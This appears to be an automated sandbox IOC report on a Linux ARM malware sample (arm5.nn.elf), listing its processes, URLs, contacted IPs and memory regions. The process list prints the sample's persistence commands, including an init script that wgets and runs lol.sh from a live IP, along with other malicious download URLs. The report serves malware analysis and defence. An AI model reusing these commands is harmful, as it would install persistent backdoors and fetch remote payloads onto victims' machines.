Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.tKOT7gIk0b /tmp/tmp.dWU4Um3rwG /tmp/tmp.SKAtgbf7va

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.tKOT7gIk0b /tmp/tmp.dWU4Um3rwG /tmp/tmp.SKAtgbf7va

/tmp/arm5.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/arm5.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/arm5.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/arm5.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"

/tmp/arm5.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/arm5.nn.elf

/tmp/arm5.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/arm5.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf

/tmp/arm5.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 40 hidden processes, click here to show them.

URLs

Name

Malicious

http://94.156.227.233/curl.sh

unknown

Details

Name:	http://94.156.227.233/curl.sh
TargetID:	16
From Memory:	true
Current Path:	/tmp/arm5.nn.elf
Source:	arm5.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/lol.sh

unknown

Details

Name:	http://94.156.227.233/lol.sh
TargetID:	16
From Memory:	true
Current Path:	/tmp/arm5.nn.elf
Source:	arm5.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

unknown

http://94.156.227.233/

unknown

Details

Name:	http://94.156.227.233/
TargetID:	-1
From Memory:	true
Source:	arm5.nn.elf, system.16.dr, inittab.16.dr, profile.16.dr, arm5.nn.elf.36.dr, custom.service.16.dr, bootcmd.16.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

142.140.249.240

unknown

Canada

180.152.123.206

unknown

China

16.174.89.80

unknown

United States

137.181.232.189

unknown

United States

48.48.126.136

unknown

United States

65.166.13.98

unknown

United States

217.234.140.150

unknown

Germany

61.59.84.141

unknown

Taiwan; Republic of China (ROC)

194.71.56.93

unknown

Sweden

8.16.225.88

unknown

United States

148.21.179.124

unknown

United States

198.86.164.26

unknown

United States

5.1.77.232

unknown

Germany

102.1.138.159

unknown

219.56.44.197

unknown

Japan

202.195.124.39

unknown

China

153.90.129.118

unknown

United States

208.104.247.76

unknown

United States

69.78.18.202

unknown

United States

111.102.184.61

unknown

Japan

199.168.24.43

unknown

United States

35.188.150.152

unknown

United States

220.161.70.253

unknown

China

213.41.92.253

unknown

United Kingdom

132.183.9.249

unknown

United States

146.91.129.246

unknown

United States

172.212.161.230

unknown

United States

187.61.232.248

unknown

Brazil

44.117.59.217

unknown

United States

113.33.239.86

unknown

Japan

71.178.45.244

unknown

United States

74.138.34.36

unknown

United States

207.43.22.191

unknown

United States

122.80.147.209

unknown

China

182.34.50.141

unknown

China

8.108.177.60

unknown

United States

95.120.74.79

unknown

Spain

214.184.61.142

unknown

United States

97.2.95.141

unknown

United States

160.116.62.183

unknown

South Africa

135.126.20.250

unknown

United States

7.25.208.129

unknown

United States

187.139.45.242

unknown

Mexico

97.11.190.230

unknown

United States

36.104.203.113

unknown

China

107.111.242.33

unknown

United States

131.153.153.83

unknown

United States

115.192.142.13

unknown

China

177.232.41.30

unknown

Mexico

41.116.48.34

unknown

South Africa

187.139.255.153

unknown

Mexico

19.46.47.47

unknown

United States

141.224.216.98

unknown

United States

221.17.67.204

unknown

Japan

221.143.115.84

unknown

Korea Republic of

32.166.154.66

unknown

United States

70.104.159.96

unknown

United States

176.231.112.166

unknown

Israel

68.2.22.233

unknown

United States

32.85.124.10

unknown

United States

103.135.166.192

unknown

China

78.83.54.222

unknown

Bulgaria

12.3.68.57

unknown

United States

182.151.4.187

unknown

China

203.175.25.65

unknown

Japan

98.20.181.229

unknown

United States

15.204.184.191

unknown

United States

182.92.199.130

unknown

China

176.152.246.179

unknown

France

140.251.109.191

unknown

United States

54.68.108.242

unknown

United States

209.204.81.89

unknown

United States

193.3.143.160

unknown

Denmark

187.245.239.186

unknown

Mexico

63.89.46.181

unknown

United States

132.170.120.10

unknown

United States

57.245.3.240

unknown

Belgium

35.249.158.106

unknown

United States

111.151.135.68

unknown

China

192.70.236.185

unknown

United States

88.162.201.158

unknown

France

134.248.5.101

unknown

United States

13.236.254.247

unknown

United States

6.253.169.80

unknown

United States

129.111.91.190

unknown

United States

175.11.60.41

unknown

China

149.0.87.139

unknown

Turkey

139.188.67.200

unknown

Australia

54.2.45.144

unknown

United States

18.25.146.210

unknown

United States

198.193.165.226

unknown

United States

79.123.164.113

unknown

Turkey

220.188.108.221

unknown

China

161.91.160.164

unknown

Netherlands

123.161.88.178

unknown

China

21.84.149.231

unknown

United States

61.98.225.151

unknown

Korea Republic of

205.159.7.216

unknown

United States

50.189.222.46

unknown

United States

75.247.161.63

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f8c64031000

page execute read

7f8d6878a000

page read and write

7f8d69c6c000

page read and write

7f8d69614000

page read and write

7fff1b0e9000

page execute read

7fff1b043000

page read and write

7f8d69b43000

page read and write

7f8c64039000

page read and write

5578e3d6d000

page execute read

5578e5fdc000

page read and write

7f8d69780000

page read and write

7f8d69024000

page read and write

7f8d69c90000

page read and write

7f8d64021000

page read and write

7f8d69386000

page read and write

5578e3fbe000

page read and write

7f8d63fff000

page read and write

5578e5fc5000

page execute and read and write

7f8d68f92000

page read and write

7f8d69962000

page read and write

5578e7bf1000

page read and write

7f8d695f1000

page read and write

5578e3fc7000

page read and write

7f8c6403e000

page read and write

7f8d69cd5000

page read and write

There are 15 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm5.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm5.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
arm5.nn.elf